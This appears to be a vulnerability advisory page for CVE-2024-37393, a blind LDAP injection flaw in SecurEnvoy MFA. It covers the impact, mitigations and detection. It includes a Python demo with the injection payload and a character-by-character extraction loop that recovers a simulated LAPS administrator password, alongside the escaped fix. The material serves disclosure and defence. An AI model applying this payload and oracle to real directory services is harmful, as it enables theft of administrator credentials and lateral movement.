CVE-2024-37393 in SecurEnvoy MFA

Summary

by MITRE • 06/10/2024

Multiple LDAP injection vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.


Analysis

by VulDB Data Team • 06/13/2024

The vulnerability identified as CVE-2024-37393 is a critical flaw in SecurEnvoy Multi-Factor Authentication (MFA) software before version 9.4.514. The DESKTOP service component, reached over HTTP at the /secserver endpoint, builds LDAP search filters from user-supplied input without adequate validation or escaping. This yields multiple LDAP injection flaws that an unauthenticated remote attacker can use to read Active Directory data. Because the service performs these directory lookups as part of its authentication flow, an injected filter is evaluated with the directory permissions of the account the service binds with, which is what brings sensitive attributes within reach.

Technically, the issue is blind LDAP injection. When the DESKTOP service handles a request on /secserver, a user-controlled value is placed directly into an LDAP filter, so an attacker can close the intended clause and append clauses of their own, for example a comparison against an attribute the service never meant to expose. The injection is blind because the attacker never sees the search result itself, only whether the service's response differs (a user found versus not found, or a difference in response time). By appending a prefix match on the target attribute and varying the prefix, the attacker turns each request into a yes/no oracle and recovers the attribute value one character at a time. One practical caveat: Active Directory compares string attributes case-insensitively in filters, so an oracle of this kind recovers letters without their case, and the attacker has to try case combinations afterwards.

The operational impact is severe for organizations that rely on SecurEnvoy for MFA, because the injected queries can reach credential material stored in Active Directory. The most serious case is the ms-Mcs-AdmPwd attribute, which holds the cleartext local Administrator password managed by the legacy Local Administrator Password Solution (LAPS). LAPS passwords are unique per host, so each recovered value gives local administrator on one machine; repeating the extraction against every computer object the service account can read supports credential theft and lateral movement across the domain. Any deployment that has not been updated to SecurEnvoy 9.4.514 or later is exposed, and because no credentials are needed to start the attack, an internet- or network-exposed /secserver endpoint is the primary risk.

Mitigation starts with updating SecurEnvoy to 9.4.514 or later, which contains the input validation fixes. Until then, restrict network access to the /secserver endpoint to the clients that need it, and review which directory accounts can read ms-Mcs-AdmPwd: the SecurEnvoy service account should not hold that right, which limits what any injection can reach. In code, the durable fix for this bug class is to escape every user-supplied value placed in a filter (RFC 4515 escaping of \, *, (, ) and NUL) or to use a library's parameterized filter builder rather than string concatenation. VulDB files the issue under CWE-94 (improper control of generation of code); the more specific weakness is CWE-90, LDAP injection. In ATT&CK terms the exploit itself is T1190 (Exploit Public-Facing Application) and use of the recovered LAPS passwords is T1078.003 (Valid Accounts: Local Accounts); mappings to T1078.004 (Cloud Accounts) or T1566.001 (Spearphishing Attachment) do not fit, since the attack needs no phishing and no prior account. For detection, watch for requests to /secserver whose identity parameters carry filter metacharacters such as * and ), and for searches against ms-Mcs-AdmPwd on the domain controllers (Active Directory does not log search filters by default, so this requires enabling its LDAP diagnostic logging). Regular assessment of other exposed components of the authentication infrastructure for the same pattern rounds this out.
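The blind injection mechanics described in the analysis and the escaping fix called for in the mitigations, as an added example that is neither SecurEnvoy's code nor VulDB's. It assumes a lookup of the form (&(objectClass=user)(sAMAccountName=<input>)), a constructed two-entry directory standing in for Active Directory, and a service that reports only found/not found; the real /secserver parameter names and filter are not on this page and are not reproduced here.

```python
"""Blind LDAP injection against a simulated directory: the vulnerable filter
construction, its RFC 4515-escaped replacement, and the yes/no oracle loop an
attacker drives to read an attribute one character at a time.
Added example, not SecurEnvoy code: filter shape and directory are assumptions."""
import re

# Constructed in-memory directory standing in for AD (not real data).
# Computer objects carry objectClass=user too, as they do in AD.
DIRECTORY = [
    {"objectClass": ["top", "person", "user"], "sAMAccountName": "alice"},
    {"objectClass": ["top", "person", "user", "computer"],
     "sAMAccountName": "WS01$", "ms-Mcs-AdmPwd": "Zq7!kP"},
]

def escape_filter_value(value: str) -> str:
    """Escape a value for use inside an LDAP search filter (RFC 4515 section 3)."""
    table = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}
    return "".join(table.get(ch, ch) for ch in value)

def vulnerable_filter(username: str) -> str:
    """Raw concatenation: the input can close the clause and add its own."""
    return f"(&(objectClass=user)(sAMAccountName={username}))"

def hardened_filter(username: str) -> str:
    """Same query with the value escaped, so it can only ever be a literal."""
    return f"(&(objectClass=user)(sAMAccountName={escape_filter_value(username)}))"

# --- Minimal LDAP filter evaluator: &, |, !, equality and substring match ---
def _unescape(s: str) -> str:
    return re.sub(r"\\([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)

def _parse(s: str, i: int):
    """Parse one parenthesised filter at s[i]; return (node, index after it)."""
    if s[i] != "(":
        raise ValueError("expected '('")
    i += 1
    if s[i] in "&|!":
        op, kids, i = s[i], [], i + 1
        while s[i] == "(":
            kid, i = _parse(s, i)
            kids.append(kid)
        if s[i] != ")" or not kids:
            raise ValueError("malformed compound filter")
        return (op, kids), i + 1
    end = s.index(")", i)                   # a raw ')' always ends an item
    attr, _, pattern = s[i:end].partition("=")
    return ("=", attr.lower(), pattern), end + 1

def parse_filter(s: str):
    node, i = _parse(s, 0)
    if i != len(s):
        raise ValueError("trailing data after filter")
    return node

def _match(pattern: str, actual: str) -> bool:
    """Equality or substring match; case-insensitive, as AD compares
    DirectoryString attributes such as ms-Mcs-AdmPwd."""
    pieces = [_unescape(p).lower() for p in pattern.split("*")]
    actual = actual.lower()
    if len(pieces) == 1:
        return actual == pieces[0]
    if not (actual.startswith(pieces[0]) and actual.endswith(pieces[-1])):
        return False
    pos, limit = len(pieces[0]), len(actual) - len(pieces[-1])
    for mid in pieces[1:-1]:
        idx = actual.find(mid, pos, limit)
        if idx < 0:
            return False
        pos = idx + len(mid)
    return pos <= limit

def _eval(node, entry) -> bool:
    if node[0] == "&":
        return all(_eval(k, entry) for k in node[1])
    if node[0] == "|":
        return any(_eval(k, entry) for k in node[1])
    if node[0] == "!":
        return not _eval(node[1][0], entry)
    _, attr, pattern = node
    values = {k.lower(): v for k, v in entry.items()}.get(attr, [])
    values = [values] if isinstance(values, str) else values
    return any(_match(pattern, v) for v in values)

def service_lookup(ldap_filter: str) -> bool:
    """Stand-in for the service's directory query: True if an entry matches.
    A malformed filter is reported as 'not found', still one oracle bit."""
    try:
        node = parse_filter(ldap_filter)
    except (ValueError, IndexError):
        return False
    return any(_eval(node, e) for e in DIRECTORY)

# --- Boolean-based blind extraction driven through the filter builder ---
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789!#$%&+,-.:;<=>?@[]^_{}~"

def blind_extract(build, oracle, attr: str, max_len: int = 64) -> str:
    """Recover `attr` of a matching entry one character at a time, modulo case."""
    known = ""
    while len(known) < max_len:
        for ch in CHARSET:
            payload = f"*)({attr}={escape_filter_value(known + ch)}*"
            if oracle(build(payload)):
                known += ch
                break
        else:                               # no character extends the prefix
            break
    return known

if __name__ == "__main__":
    print("vulnerable:", blind_extract(vulnerable_filter, service_lookup, "ms-Mcs-AdmPwd"))
    print("hardened:", repr(blind_extract(hardened_filter, service_lookup, "ms-Mcs-AdmPwd")))
```

Against the vulnerable builder the loop recovers zq7!kp, the stored password without its case, which is the case-insensitivity caveat from the analysis; against the hardened builder the same payloads become a literal sAMAccountName value that matches nothing, so nothing is recovered. The evaluator is deliberately small (no approximate, presence or extensible matches) and exists only to make the oracle runnable offline.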

Reservation

06/07/2024

Disclosure

06/10/2024

Moderation

accepted

CPE

ready

EPSS

0.03304

KEV

no

Activities

very low
